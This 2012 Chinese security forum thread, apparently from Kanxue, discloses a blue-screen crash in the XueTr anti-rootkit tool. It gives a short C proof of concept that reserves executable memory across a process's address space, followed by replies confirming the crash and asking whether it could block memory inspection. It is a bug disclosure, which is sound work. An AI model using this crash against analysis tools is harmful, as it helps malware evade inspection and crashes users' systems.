首页
论坛
课程
招聘
[原创]XueTr的一个BSOD
2012-3-26 16:15 4858

[原创]XueTr的一个BSOD

2012-3-26 16:15
4858
#include <Windows.h>
#include <stdio.h>
void main( )
{
	for ( int i = 0x1000; i < 0x80000000; i = i + 0x1000 )
	{
		VirtualAllocEx( (HANDLE)-1, (PVOID)i, 0x1000, MEM_RESERVE, PAGE_EXECUTE_READWRITE );
	}
	printf("完了");
	getchar();
	return;
}


编译以上代码为XXX.exe,在Windows XP SP3下双击运行,显示“完了”后,打开XueTr,右键XXX.exe,依次点击“查看...”->“查看进程内存”,即可蓝屏。

[注意] 欢迎加入看雪团队!base上海,招聘CTF安全工程师,将兴趣和工作融合在一起!看雪20年安全圈的口碑,助你快速成长!

收藏
点赞0
打赏
分享
最新回复 (8)
雪    币: 1572
活跃值: 活跃值 (10)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
fqhlxw 活跃值 2012-3-26 16:21
2
0
雪    币: 49
活跃值: 活跃值 (16)
能力值: ( LV15,RANK:520 )
在线值:
发帖
回帖
粉丝
邓韬 活跃值 9 2012-3-26 16:41
3
0
膜拜一下,膜拜一下
雪    币: 2270
活跃值: 活跃值 (448)
能力值: ( LV8,RANK:120 )
在线值:
发帖
回帖
粉丝
zhouws 活跃值 2 2012-3-26 16:51
4
0
像楼主这样沉得住气研究技术的不多了。

可以的话,PM给个联系方式交个朋友
雪    币: 41
活跃值: 活跃值 (25)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
markro 活跃值 2012-3-26 17:02
5
0
测试了一下,果然。。。
雪    币: 306
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
天法道 活跃值 2012-3-26 17:39
6
0
有意思啥。。。
雪    币: 516
活跃值: 活跃值 (248)
能力值: ( LV13,RANK:290 )
在线值:
发帖
回帖
粉丝
guxinyi 活跃值 5 2012-3-26 18:20
7
0
呵呵,多次递归调用,
上传的附件:
  • 1.png (23.25kb,238次下载)
雪    币: 216
活跃值: 活跃值 (120)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
dayang 活跃值 2012-3-26 22:53
8
0
for ( int i = 0x1000; i < 0x80000000; i = i + 0x1000 )
  {
    VirtualAllocEx( (HANDLE)-1, (PVOID)i, 0x1000, MEM_RESERVE, PAGE_EXECUTE_READWRITE );
  }

可以用来防止查看自己内存?
雪    币: 279
活跃值: 活跃值 (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
forlovefor 活跃值 2012-3-27 00:08
9
0
楼主可否大概说说你是怎么挖出来的呢..
游客
登录 | 注册 方可回帖
返回